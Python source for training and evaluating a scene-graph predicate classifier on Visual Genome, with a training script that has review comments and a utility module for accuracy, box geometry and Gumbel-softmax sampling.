parser.add_argument('--use-cls', action='store_true', default=False,
                    help='add a classification layer and use the confidence score as feature')
parser.add_argument('--node-types', type=int, default=201,
                    help='The number of node types to infer.')
# ===================== Args Definition =======================#
args = parser.parse_args()
# vis = Visualizer(env='vg_'+args.encoder+'_'+args.tail)
# ---------- ground truth path --#
graph_path = './data/vg_pred_graph_roidb.npz'
graph_roidb = read_roidb(graph_path)
train_roidb = graph_roidb['train']
# NOTE(review): the validation split is the *test* split here, so reported
# "val" recall numbers are test-set numbers -- confirm this is intended.
val_roidb = graph_roidb['test']
test_roidb = graph_roidb['test']
# ipdb.set_trace()
# ------------------------------------#
# Translate --feat-mode into the two encoder feature switches:
# 'full' -> visual + semantic, 'vis' -> visual only, 'sem' -> semantic only,
# anything else -> no input features at all.
if args.feat_mode == 'full':
    use_vis = True
    use_sem = True
elif args.feat_mode == 'vis':
    use_vis = True
    use_sem = False
elif args.feat_mode == 'sem':
    use_vis = False
    use_sem = True
else:
    use_vis = False
    use_sem = False
    print('No feature input')
# Seed every RNG used (numpy + torch CPU/GPU) for reproducibility.
args.cuda = not args.no_cuda and torch.cuda.is_available()
print(args)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.cuda:
    torch.cuda.manual_seed(args.seed)
log = None
# Save model and meta-data. Always saves in a new folder.
# NOTE(review): if args.save_folder is empty, the `else` branch below prints
# `save_folder` before it is ever assigned -> NameError. Likewise, restoring
# (--restore) without --load-folder leaves meta_file/model_file/... undefined.
# The supported flows appear to be: save_folder set (fresh run), or
# save_folder + load_folder + restore (resume). Confirm and harden if needed.
if args.save_folder:
    if args.restore:
        pass
    else:
        # Find the first unused '<encoder>_<feat_mode>_<tail>_expN' folder.
        exp_counter = 0
        save_folder = os.path.join(args.save_folder, '{}_{}_{}_exp{}'.format(args.encoder, args.feat_mode, \
            args.tail, exp_counter))
        while os.path.isdir(save_folder):
            exp_counter += 1
            save_folder = os.path.join(args.save_folder, '{}_{}_{}_exp{}'.format(args.encoder, args.feat_mode, \
                args.tail, exp_counter))
        os.mkdir(save_folder)
        # temp.pt holds the latest epoch; encoder.pt holds the best model.
        meta_file = os.path.join(save_folder, 'metadata.pkl')
        model_file = os.path.join(save_folder, 'temp.pt')
        best_model_file = os.path.join(save_folder, 'encoder.pt')
        log_file = os.path.join(save_folder, 'log.txt')
        log = open(log_file, 'w')
        pickle.dump({'args': args}, open(meta_file, "wb"))
        print("save_folder: {}".format(save_folder))
else:
    print("Save_folder: {}".format(save_folder))
# When a load folder is named, point all checkpoint/log paths at it instead.
if args.load_folder:
    load_folder = os.path.join('./checkpoints/vg', args.encoder +'_'
        + args.feat_mode +'_'+ args.tail + '_' + args.load_folder)
    meta_file = os.path.join(load_folder, 'metadata.pkl')
    model_file = os.path.join(load_folder, 'temp.pt')
    best_model_file = os.path.join(load_folder, 'encoder.pt')
    log_file = os.path.join(load_folder, 'log_new.txt')
    log = open(log_file, 'w')
    pickle.dump({'args': args}, open(meta_file, "wb"))
    if args.restore:
        save_folder = load_folder
else:
    load_folder = save_folder
print("Load_folder: {}".format(load_folder))
# ===================== Model Definition ========================#
# NOTE(review): any --encoder value other than 'simple'/'nmp' leaves `model`
# undefined and crashes at model.cuda() below -- confirm intended.
if args.encoder == 'simple':
    model = SimpleEncoder(args.hidden,
            edge_types=args.edge_types, node_types=args.node_types,
            do_prob=args.dropout, use_vis=use_vis, use_spatial=False, use_sem=use_sem, use_loc=args.use_loc, use_cls=args.use_cls)
elif args.encoder == 'nmp':
    model = NMPEncoder(args.hidden,
            edge_types=args.edge_types, node_types=args.node_types, n_iter=args.n_iter,
            do_prob=args.dropout, use_vis=use_vis, use_spatial=False, use_sem=use_sem, use_loc=args.use_loc, use_cls=args.use_cls)
if args.cuda:
    model.cuda()
# optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=0.0005)
optimizer = optim.RMSprop(model.parameters(), lr=args.lr, alpha=0.99, eps=1e-08, weight_decay=0.0005, momentum=0, centered=False)
# Step decay: multiply the LR by gamma every lr_decay epochs.
scheduler = lr_scheduler.StepLR(optimizer, step_size=args.lr_decay,
                    gamma=args.gamma)
# --------------- Parameters Loader ------------------#
best_model_params = model.state_dict()
if args.restore:
    model.load_state_dict(torch.load(model_file))
# ================== Data Loader ================================#
# NOTE(review): eval_batch_size is passed args.batch_size here, so the
# --eval-batch-size flag is effectively unused by the loaders.
train_loader, val_loader, test_loader = load_dataset(data_set='vg', ori_vgg=args.ori_vgg, dataset='pred', level='image',
                    batch_size=args.batch_size, eval_batch_size=args.batch_size,
                    shuffle=args.shuffle, feat_mode=args.feat_mode)
# ================== Loss Weights ===============================#
# Per-class weights for the margin loss: 1 for real predicates, args.weight
# for the last class (background / no relation); 0 at test time so the
# background class never contributes.
cls_ws_train = np.array(np.concatenate([np.ones(args.edge_types-1), [args.weight]],0), dtype=np.float32)
cls_ws_test = np.array(np.concatenate([np.ones(args.edge_types-1), [0]],0), dtype=np.float32)
cls_ws_train = torch.FloatTensor(cls_ws_train)
cls_ws_test = torch.FloatTensor(cls_ws_test)
if args.cuda:
    cls_ws_train = cls_ws_train.cuda()
    cls_ws_test = cls_ws_test.cuda()
cls_ws_train = Variable(cls_ws_train, requires_grad=False)
cls_ws_test = Variable(cls_ws_test, requires_grad=False)
# =============== iterate one epoch =====================#
def iter_one_epoch(roidb, data_loader, batch_size, is_rela=False, is_training=True):
    """Run one pass over `data_loader`, optionally optimizing the model.

    Relies on module-level globals: args, model, optimizer, cls_ws_train,
    load_folder, and the helpers compute_acc/graph_npy2roidb/eval_result.

    Args:
        roidb: roidb list matching the loader, used for recall evaluation.
        data_loader: yields (data, target, node_cls, edge_feats, rel_rec,
            rel_send, bbox_loc, prior) batches.
        batch_size: samples per batch, used to slice prediction buffers.
        is_rela: True -> relation-detection graphs, False -> predicate graphs.
        is_training: if True, back-propagate and step the optimizer.

    Returns:
        (loss_all, edge_loss_all, node_loss_all, edge_acc_all, node_acc_all,
         recall_50, recall_100, pred_roidb)
    """
    loss_all = []
    recall_50 = 0.0
    recall_100 = 0.0
    edge_loss_all = []
    edge_acc_all = []
    node_loss_all = []
    node_acc_all = []
    pbar = tqdm(total=len(data_loader.dataset))
    if is_rela:
        num_nodes = args.rela_num_atoms
        num_edges = num_nodes * (num_nodes - 1)
    else:
        num_nodes = args.num_atoms
        num_edges = args.num_edges
    # Per-edge prediction buffers; unfilled slots default to the
    # background class (edge_types - 1).
    pred_probs = np.zeros([len(data_loader.dataset), num_edges])
    pred_cls = np.zeros([len(data_loader.dataset), num_edges]) + args.edge_types - 1
    for batch_idx, (data, target, node_cls, edge_feats, rel_rec, rel_send, bbox_loc, prior) in enumerate(data_loader):
        if args.cuda:
            data, target, edge_feats = data.cuda(), target.cuda(), edge_feats.cuda()
            rel_rec, rel_send = rel_rec.cuda(), rel_send.cuda()
            prior = prior.cuda()
            node_cls = node_cls.cuda()
            bbox_loc = bbox_loc.cuda()
        # --------- optimize ------------#
        if is_training:
            optimizer.zero_grad()
        # --------- Forward -----------#
        output, node_output = model(data, edge_feats, rel_rec, rel_send, bbox_loc)
        output = output.view(-1, args.edge_types)
        node_output = node_output.view(-1, args.node_types)
        if args.prior:
            prior = prior.view(-1, args.edge_types)
            rel_score = prior + output
        # --------- loss ----------------#
        target = target.view(-1)
        node_cls = node_cls.view(-1)
        # BUG FIX: node_loss was only computed on the non-prior branch, so
        # node_loss_all.append(node_loss.item()) below raised NameError
        # whenever --prior was set. It is branch-independent, so compute it
        # unconditionally; non-prior behavior is unchanged.
        node_loss = F.cross_entropy(node_output, node_cls, ignore_index=args.node_types-1)
        if args.prior:
            edge_loss = F.multi_margin_loss(rel_score, target, weight=cls_ws_train, size_average=False)
            # Normalize the summed margin loss by the non-background edges.
            edge_count = args.edge_types / (target < args.edge_types-1).data.sum()
            loss = edge_loss * edge_count
        else:
            edge_loss = F.cross_entropy(output, target, ignore_index=args.edge_types-1)
            if args.use_cls:
                loss = edge_loss + node_loss
            else:
                loss = edge_loss
        # -------- backward --------------#
        if is_training:
            # vis.plot_many_stack({'train_loss': loss.data.cpu().numpy()[0]})
            loss.backward()
            optimizer.step()
        # ============= accuracy ==============#
        # ------ edge acc -------#
        edge_acc = compute_acc(output, target, ignored_index=args.edge_types-1)
        node_acc = compute_acc(node_output, node_cls, ignored_index=args.node_types-1)
        edge_acc_all.append(edge_acc)
        node_acc_all.append(node_acc)
        loss_all.append(loss.item())
        edge_loss_all.append(edge_loss.item())
        node_loss_all.append(node_loss.item())
        # --------- save ---------------#
        output = F.softmax(output, dim=-1)
        output = output.view(-1, num_edges, args.edge_types)
        pred_prob, pred_cl = output.max(-1)
        # The final batch may be short; slice only up to the dataset end.
        if (batch_idx+1)*batch_size > len(data_loader.dataset):
            pred_probs[batch_idx*batch_size:] = pred_prob.data.cpu().numpy()
            pred_cls[batch_idx*batch_size:] = pred_cl.data.cpu().numpy()
        else:
            pred_probs[batch_idx*batch_size:(batch_idx+1)*batch_size] = pred_prob.data.cpu().numpy()
            pred_cls[batch_idx*batch_size:(batch_idx+1)*batch_size] = pred_cl.data.cpu().numpy()
        pbar.update(batch_size)
    pbar.close()
    # Convert raw predictions into a roidb and score recall@50/100.
    if is_rela:
        pred_roidb = graph_npy2roidb(roidb, pred_probs, pred_cls, mode='rela', topk=False)
        recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=False, mode='rela', topk=False, dataset='vg')
        recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=False, mode='rela', topk=False, dataset='vg')
    else:
        pred_roidb = graph_npy2roidb(roidb, pred_probs, pred_cls, mode='pred', topk=False)
        recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=False, mode='pred', topk=False, dataset='vg')
        recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=False, mode='pred', topk=False, dataset='vg')
    if not is_training:
        if is_rela:
            head = 'rela_'
        else:
            head = 'pred_'
        np.savez(os.path.join(load_folder, head + 'roidb'), pred_roidb)
    return loss_all, edge_loss_all, node_loss_all, edge_acc_all, node_acc_all, recall_50, recall_100, pred_roidb
# =============== Train Op ==============================#
def train(epoch, best_val_accuracy):
    """Run one training epoch plus a validation pass, checkpoint, and log.

    Uses module-level model/optimizer/scheduler/loaders/log. Saves the
    current weights to model_file every epoch, and to best_model_file when
    recall_val beats best_val_accuracy. Returns recall_val so the caller
    can track the best epoch.
    """
    t = time.time()
    loss_train = []
    edge_loss_train = []
    node_loss_train = []
    edge_acc_train = []
    node_acc_train = []
    recall_train = 0.0
    loss_val = []
    edge_loss_val = []
    node_loss_val = []
    edge_acc_val = []
    node_acc_val = []
    recall_val = 0.0
    rela_loss_val = []
    rela_acc_val = []
    rela_recall_50 = 0.0
    rela_recall_100 = 0.0
    model.train()
    # NOTE(review): scheduler.step() is called before this epoch's optimizer
    # steps; PyTorch >= 1.1 recommends stepping after. Confirm the intended
    # LR schedule (as written, decay effectively starts one epoch early).
    scheduler.step()
    loss_train, edge_loss_train, node_loss_train, edge_acc_train, node_acc_train, recall_train, _, pred_roidb_train = \
        iter_one_epoch(train_roidb, train_loader, args.batch_size, is_training=True)
    model.eval()
    loss_val, edge_loss_val, node_loss_val, edge_acc_val, node_acc_val, recall_val, _, pred_roidb_val = \
        iter_one_epoch(val_roidb, val_loader, args.batch_size, is_training=False)
    # With --use-cls, report the edge and node losses separately.
    if args.use_cls:
        print('Epoch: {:04d}'.format(epoch),
              'loss_train: {:.04f}'.format(np.mean(loss_train)),
              'edge_loss_train : {:.04f}'.format(np.mean(edge_loss_train)),
              'node_loss_train : {:.04f}'.format(np.mean(node_loss_train)),
              'edge_acc_train: {:.04f}'.format(np.mean(edge_acc_train)),
              'node_acc_train: {:.04f}'.format(np.mean(node_acc_train)),
              'recall_train: {:.04f}'.format(recall_train))
        print('loss_val: {:.04f}'.format(np.mean(loss_val)),
              'edge_loss_val : {:.04f}'.format(np.mean(edge_loss_val)),
              'node_loss_val : {:.04f}'.format(np.mean(node_loss_val)),
              'edge_acc_val: {:.04f}'.format(np.mean(edge_acc_val)),
              'node_acc_val: {:.04f}'.format(np.mean(node_acc_val)),
              'recall_val: {:.04f}'.format(recall_val),
              'time: {:.4f}s'.format(time.time() - t))
    else:
        print('Epoch: {:04d}'.format(epoch),
              'loss_train: {:.04f}'.format(np.mean(loss_train)),
              'acc_train: {:.04f}'.format(np.mean(edge_acc_train)),
              'recall_train: {:.04f}'.format(recall_train),
              'loss_val: {:.04f}'.format(np.mean(loss_val)),
              'acc_val: {:.04f}'.format(np.mean(edge_acc_val)),
              'recall_val: {:.04f}'.format(recall_val),
              'time: {:.4f}s'.format(time.time() - t))
    # Always keep the latest weights; promote to the best checkpoint only
    # when validation recall improves.
    torch.save(model.state_dict(), model_file)
    if args.save_folder and recall_val > best_val_accuracy:
        torch.save(model.state_dict(), best_model_file)
        print('--------------Best model so far---------------')
        print('Epoch: {:04d}'.format(epoch),
              'loss_train: {:.04f}'.format(np.mean(loss_train)),
              'acc_train: {:.04f}'.format(np.mean(edge_acc_train)),
              'recall_train: {:.04f}'.format(recall_train),
              'loss_val: {:.04f}'.format(np.mean(loss_val)),
              'acc_val: {:.04f}'.format(np.mean(edge_acc_val)),
              'recall_val: {:.04f}'.format(recall_val))
    # Echo the same epoch summary into the persistent log file.
    print('Epoch: {:04d}'.format(epoch),
          'loss_train: {:.04f}'.format(np.mean(loss_train)),
          'acc_train: {:.04f}'.format(np.mean(edge_acc_train)),
          'recall_train: {:.04f}'.format(recall_train),
          'loss_val: {:.04f}'.format(np.mean(loss_val)),
          'acc_val: {:.04f}'.format(np.mean(edge_acc_val)),
          'recall_val: {:.04f}'.format(recall_val),
          'time: {:.4f}s'.format(time.time() - t), file=log)
    log.flush()
    return recall_val
def eval(roidb, test_loader, is_rela=False):
    """Score the saved model on `test_loader`: recall@50/100, plus zero-shot.

    Loads best_model_file when args.mode == 'eval', otherwise the latest
    model_file checkpoint. Saves the predicted roidb (pred mode only) and
    writes recall numbers to `log`.

    NOTE(review): this shadows the builtin eval() at module scope.
    """
    t = time.time()
    loss_test = []
    edge_acc_test = []
    node_acc_test = []
    model.eval()
    if args.mode == 'eval':
        model.load_state_dict(torch.load(best_model_file))
    else:
        model.load_state_dict(torch.load(model_file))
    if is_rela:
        num_nodes = args.rela_num_atoms
        num_edges = num_nodes * (num_nodes - 1)
        batch_size = args.eval_batch_size
    else:
        num_nodes = args.num_atoms
        num_edges = args.num_edges
        batch_size = args.batch_size
    # Per-edge buffers; unfilled slots default to the background class.
    pred_probs = np.zeros([len(test_loader.dataset), num_edges])
    pred_cls = np.zeros([len(test_loader.dataset), num_edges]) + args.edge_types - 1
    pbar = tqdm(total = len(test_loader.dataset))
    for batch_idx, (data, target, node_cls, edge_feats, rel_rec, rel_send, bbox_loc, prior) in enumerate(test_loader):
        if args.cuda:
            data, target, edge_feats = data.cuda(), target.cuda(), edge_feats.cuda()
            rel_rec, rel_send = rel_rec.cuda(), rel_send.cuda()
            node_cls, bbox_loc = node_cls.cuda(), bbox_loc.cuda()
        data = data[:, :, :].contiguous()
        with torch.no_grad():
            output, node_output = model(data, edge_feats, rel_rec, rel_send, bbox_loc)
        output = output.view(-1, args.edge_types)
        node_output = node_output.view(-1, args.node_types)
        edge_acc = compute_acc(output, target.view(-1), ignored_index=args.edge_types-1)
        node_acc = compute_acc(node_output, node_cls.view(-1), ignored_index=args.node_types-1)
        edge_acc_test.append(edge_acc)
        node_acc_test.append(node_acc)
        output = F.softmax(output, dim=-1)
        output = output.view(-1 , num_edges, args.edge_types)
        # Keep only the top-scoring class per edge.
        pred_prob, pred_cl = output.max(-1)
        # The final batch may be short; slice only up to the dataset end.
        if (batch_idx+1)*batch_size > len(test_loader.dataset):
            pred_probs[batch_idx*batch_size:] = pred_prob.data.cpu().numpy()
            pred_cls[batch_idx*batch_size:] = pred_cl.data.cpu().numpy()
        else:
            pred_probs[batch_idx*batch_size:(batch_idx+1)*batch_size] = pred_prob.data.cpu().numpy()
            pred_cls[batch_idx*batch_size:(batch_idx+1)*batch_size] = pred_cl.data.cpu().numpy()
        pbar.update(batch_size)
    pbar.close()
    if args.use_cls:
        print('[acc] edge_acc_test: {:.04f} node_acc_test: {:.04f}'.format(np.mean(edge_acc_test), np.mean(node_acc_test)))
    # print('--------Eval-----------------')
    if is_rela:
        pred_roidb = graph_npy2roidb(roidb, pred_probs, pred_cls, mode='rela', level='image', topk=False)
        recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=False, mode='rela', topk=False, dataset='vg')
        recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=False, mode='rela', topk=False, dataset='vg')
        zs_recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=True, mode='rela', topk=False, dataset='vg')
        zs_recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=True, mode='rela', topk=False, dataset='vg')
        # np.savez(os.path.join(load_folder, 'rela_roidb'), pred_roidb)
        print('[rela_eval] recall_50: {:.4f} recall_100: {:.4f}'.format(recall_50, recall_100), file=log)
        print('[zs_rela_eval] recall_50: {:.4f} recall_100: {:.4f}'.format(zs_recall_50, zs_recall_100), file=log)
    else:
        pred_roidb = graph_npy2roidb(roidb, pred_probs, pred_cls, mode='pred', level='image', topk=False)
        recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=False, mode='pred', topk=False, dataset='vg')
        recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=False, mode='pred', topk=False, dataset='vg')
        zs_recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=True, mode='pred', topk=False, dataset='vg')
        zs_recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=True, mode='pred', topk=False, dataset='vg')
        np.savez(os.path.join(load_folder, 'pred_roidb'), pred_roidb)
        print('[pred_eval] recall_50: {:.4f} recall_100: {:.4f}'.format(recall_50, recall_100), file=log)
        print('[zs_pred_eval] recall_50: {:.4f} recall_100: {:.4f}'.format(zs_recall_50, zs_recall_100), file=log)
    print('recall_50: {:.4f} recall_100: {:.4f}'.format(recall_50, recall_100))
    print('[zs] recall_50: {:.4f} recall_100: {:.4f}'.format(zs_recall_50, zs_recall_100))
    return
def eval_topk(roidb, test_loader, is_rela=False, k=100):
    """Like eval(), but keeps the top-k classes per edge instead of the argmax.

    Loads best_model_file when args.mode == 'eval', otherwise model_file.
    Reports recall@50/100 (normal + zero-shot) under the top-k protocol.
    """
    t = time.time()
    loss_test = []
    acc_test = []
    model.eval()
    if args.mode == 'eval':
        model.load_state_dict(torch.load(best_model_file))
    else:
        model.load_state_dict(torch.load(model_file))
    if is_rela:
        num_nodes = args.rela_num_atoms
        num_edges = num_nodes * (num_nodes - 1)
        batch_size = args.eval_batch_size
    else:
        num_nodes = args.num_atoms
        num_edges = args.num_edges
        batch_size = args.batch_size
    # [dataset, edges, k] buffers; unfilled slots default to background.
    pred_probs = np.zeros([len(test_loader.dataset), num_edges, k])
    pred_cls = np.zeros([len(test_loader.dataset), num_edges, k]) + args.edge_types-1
    pbar = tqdm(total = len(test_loader.dataset))
    for batch_idx, (data, target, node_cls, edge_feats, rel_rec, rel_send, bbox_loc, prior) in enumerate(test_loader):
        if args.cuda:
            data, target, edge_feats = data.cuda(), target.cuda(), edge_feats.cuda()
            rel_rec, rel_send = rel_rec.cuda(), rel_send.cuda()
            node_cls, bbox_loc = node_cls.cuda(), bbox_loc.cuda()
        data = data[:, :, :].contiguous()
        with torch.no_grad():
            output, _ = model(data, edge_feats, rel_rec, rel_send, bbox_loc)
        output = output.view(-1, args.edge_types)
        output = F.softmax(output, dim=-1)
        output = output.view(-1 , num_edges, args.edge_types)
        # Top-k classes per edge, sorted by descending probability.
        pred_prob, pred_cl = torch.topk(output, k, dim=-1, largest=True, sorted=True)
        # The final batch may be short; slice only up to the dataset end.
        if (batch_idx+1)*batch_size > len(test_loader.dataset):
            pred_probs[batch_idx*batch_size:] = pred_prob.data.cpu().numpy()
            pred_cls[batch_idx*batch_size:] = pred_cl.data.cpu().numpy()
        else:
            pred_probs[batch_idx*batch_size:(batch_idx+1)*batch_size] = pred_prob.data.cpu().numpy()
            pred_cls[batch_idx*batch_size:(batch_idx+1)*batch_size] = pred_cl.data.cpu().numpy()
        pbar.update(batch_size)
    pbar.close()
    # print('--------Eval-----------------')
    if is_rela:
        pred_roidb = graph_npy2roidb(roidb, pred_probs, pred_cls, mode='rela', level='image', topk=True)
        recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=False, mode='rela', topk=True, dataset='vg')
        recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=False, mode='rela', topk=True, dataset='vg')
        zs_recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=True, mode='rela', topk=True, dataset='vg')
        zs_recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=True, mode='rela', topk=True, dataset='vg')
        # np.savez(os.path.join(load_folder, 'topk_rela_roidb'), pred_roidb)
        print('[rela_eval_topk] recall_50: {:.4f} recall_100: {:.4f}'.format(recall_50, recall_100), file=log)
        print('[zs_rela_eval_topk] recall_50: {:.4f} recall_100: {:.4f}'.format(zs_recall_50, zs_recall_100), file=log)
    else:
        pred_roidb = graph_npy2roidb(roidb, pred_probs, pred_cls, mode='pred', level='image', topk=True)
        recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=False, mode='pred', topk=True, dataset='vg')
        recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=False, mode='pred', topk=True, dataset='vg')
        zs_recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=True, mode='pred', topk=True, dataset='vg')
        zs_recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=True, mode='pred', topk=True, dataset='vg')
        # np.savez(os.path.join(load_folder, 'topk_pred_roidb'), pred_roidb)
        print('[pred_eval_topk] recall_50: {:.4f} recall_100: {:.4f}'.format(recall_50, recall_100), file=log)
        print('[zs_pred_eval_topk] recall_50: {:.4f} recall_100: {:.4f}'.format(zs_recall_50, zs_recall_100), file=log)
    print('recall_50: {:.4f} recall_100: {:.4f}'.format(recall_50, recall_100))
    print('[zs] recall_50: {:.4f} recall_100: {:.4f}'.format(zs_recall_50, zs_recall_100))
    return
# Train model
# Entry logic: 'whole'/'train' -> train for args.epochs, tracking the best
# validation recall, then run final evaluation; 'eval' -> evaluate only.
t_total = time.time()
if args.mode == 'whole' or args.mode == 'train':
    best_val_accuracy = -1.
    best_epoch = 0
    pbar = tqdm(total=args.epochs)
    for epoch in range(args.epochs):
        print('============= Epoch {} ==========='.format(epoch))
        val_acc = train(epoch, best_val_accuracy)
        if val_acc > best_val_accuracy:
            best_val_accuracy = val_acc
            best_epoch = epoch
        # print('------------- pred --------------')
        # eval(test_roidb, test_loader, is_rela=False)
        # print('------------- pred topk--------------')
        # eval_topk(test_roidb, test_loader, is_rela=False)
        pbar.update(1)
    pbar.close()
    print("======Optimization Finished!======")
    print("Best Epoch: {:04d}".format(best_epoch))
    if args.save_folder:
        print("Best Epoch: {:04d}".format(best_epoch), file=log)
        log.flush()
    # Final test-set evaluation with the best/latest checkpoint.
    print('------------- pred --------------')
    eval(test_roidb, test_loader, is_rela=False)
    print('------------- pred topk--------------')
    eval_topk(test_roidb, test_loader, is_rela=False)
    if log is not None:
        print(save_folder)
        log.close()
    print("Total time elapsed: {:.4f}s".format(time.time() - t_total))
elif args.mode == 'eval':
    print('------------- pred --------------')
    eval(test_roidb, test_loader, is_rela=False)
    print('------------- pred topk--------------')
    eval_topk(test_roidb, test_loader, is_rela=False)
    if log is not None:
        print(load_folder)
        log.close()
    print("Total time elapsed: {:.4f}s".format(time.time() - t_total))
--- FILE SEPARATOR ---
from __future__ import print_function
import numpy as np
import os
import ipdb
import time
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
# def read_roidb(roidb_path):
# '''python2'''
# roidb_file = np.load(roidb_path)
# key = roidb_file.keys()[0]
# roidb_temp = roidb_file[key]
# roidb = roidb_temp[()]
# return roidb
def compute_acc(output, target, ignored_index):
    '''
    Classification accuracy over the non-ignored targets.

    output : [N, N_cls] class scores
    target : [N,]; GT category
    ignored_index: int; the category that does not count

    Returns a Python float (0.0 when every target is the ignored class).
    '''
    pred = output.data.max(1, keepdim=True)[1]
    # Only targets strictly below ignored_index count toward accuracy.
    count_mask = (target < ignored_index)
    correct = (pred.eq(target.data.view_as(pred)) * count_mask.view(-1,1).data).cpu().sum()
    count = count_mask.data.cpu().sum()
    if count < 0.1:
        # BUG FIX: the original assigned the plain int 0 here and then
        # called .item() on it, raising AttributeError whenever every
        # target was the ignored class.
        return 0.0
    acc = correct.float()/count.float()
    return acc.item()
def compute_iou_each(box1, box2):
    '''
    Intersection-over-union of two boxes [x_min, y_min, x_max, y_max]
    (pixel-inclusive convention: widths/heights get a +1).
    '''
    # Corners of the intersection rectangle.
    ix_min, iy_min = max(box1[0], box2[0]), max(box1[1], box2[1])
    ix_max, iy_max = min(box1[2], box2[2]), min(box1[3], box2[3])
    if ix_max < ix_min or iy_max < iy_min:
        # Disjoint boxes: no overlap at all.
        return 0
    inter = (ix_max - ix_min + 1) * (iy_max - iy_min + 1)
    area1 = (box1[2] - box1[0] + 1) * (box1[3] - box1[1] + 1)
    area2 = (box2[2] - box2[0] + 1) * (box2[3] - box2[1] + 1)
    return inter / float(area1 + area2 - inter)
def compute_distance(box1, box2):
    """Center distance of two boxes, normalized by the enclosing-box diagonal."""
    cx_a, cy_a = (box1[0] + box1[2]) / 2.0, (box1[1] + box1[3]) / 2.0
    cx_b, cy_b = (box2[0] + box2[2]) / 2.0, (box2[1] + box2[3]) / 2.0
    # Enclosing (union) box of the two inputs.
    ux_min, uy_min = min(box1[0], box2[0]), min(box1[1], box2[1])
    ux_max, uy_max = max(box1[2], box2[2]), max(box1[3], box2[3])
    center_gap_sq = (cx_a - cx_b) ** 2 + (cy_a - cy_b) ** 2
    diag_sq = (ux_min - ux_max) ** 2 + (uy_min - uy_max) ** 2
    return np.sqrt(center_gap_sq / float(diag_sq))
def get_box_feats(sub_box, obj_box):
    '''
    Build a 20-d spatial feature vector for a subject/object box pair.
    box: [x_min, y_min, x_max, y_max]
    Layout: 6 subject-vs-object offsets, 6 subject-vs-union,
    6 object-vs-union, then [IoU, normalized center distance].
    (IoU / distance are inlined copies of compute_iou_each /
    compute_distance from this module, same conventions.)
    '''
    def _center(box):
        # [x_center, y_center, width, height]
        return np.array([(box[0] + box[2]) / 2.0,
                         (box[1] + box[3]) / 2.0,
                         box[2] - box[0],
                         box[3] - box[1]])
    def _six(a, b):
        # Box-regression-style offsets of center-form box a relative to b,
        # plus the reverse x/y offsets.
        return np.array([(a[0] - b[0]) / float(a[2]),
                         (a[1] - b[1]) / float(a[3]),
                         np.log(a[2] / float(b[2])),
                         np.log(a[3] / float(b[3])),
                         (b[0] - a[0]) / float(b[2]),
                         (b[1] - a[1]) / float(b[3])])
    union_box = [min(sub_box[0], obj_box[0]), min(sub_box[1], obj_box[1]),
                 max(sub_box[2], obj_box[2]), max(sub_box[3], obj_box[3])]
    c_sub, c_obj, c_uni = _center(sub_box), _center(obj_box), _center(union_box)
    # IoU with the +1 pixel-inclusive area convention.
    ix1, iy1 = max(sub_box[0], obj_box[0]), max(sub_box[1], obj_box[1])
    ix2, iy2 = min(sub_box[2], obj_box[2]), min(sub_box[3], obj_box[3])
    if ix2 < ix1 or iy2 < iy1:
        iou = 0
    else:
        inter = (ix2 - ix1 + 1) * (iy2 - iy1 + 1)
        a_sub = (sub_box[2] - sub_box[0] + 1) * (sub_box[3] - sub_box[1] + 1)
        a_obj = (obj_box[2] - obj_box[0] + 1) * (obj_box[3] - obj_box[1] + 1)
        iou = inter / float(a_sub + a_obj - inter)
    # Center distance normalized by the union-box diagonal.
    dis = np.sqrt(((c_sub[0] - c_obj[0]) ** 2 + (c_sub[1] - c_obj[1]) ** 2) /
                  float((union_box[0] - union_box[2]) ** 2 +
                        (union_box[1] - union_box[3]) ** 2))
    return np.concatenate([_six(c_sub, c_obj), _six(c_sub, c_uni),
                           _six(c_obj, c_uni), np.array([iou, dis])], 0)
def encode_onehot(labels):
    """One-hot encode labels; column order follows set(labels) iteration order."""
    classes = set(labels)
    eye = np.identity(len(classes))
    # Each distinct label gets one identity-matrix row as its code.
    row_for = {cls: eye[idx, :] for idx, cls in enumerate(classes)}
    return np.array([row_for[label] for label in labels], dtype=np.int32)
def sample_gumbel(shape, eps=1e-10):
    """
    Sample a float tensor of `shape` from Gumbel(0, 1).

    NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
    based on
    https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb ,
    (MIT license)
    """
    uniform = torch.rand(shape).float()
    # eps keeps both logs away from log(0); same formula as the reference.
    inner = torch.log(uniform + eps)
    return -torch.log(eps - inner)
def gumbel_softmax_sample(logits, tau=1, eps=1e-10):
    """
    Draw a sample from the Gumbel-Softmax distribution over `logits`.

    NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
    based on
    https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb
    (MIT license)
    """
    noise = sample_gumbel(logits.size(), eps=eps)
    if logits.is_cuda:
        noise = noise.cuda()
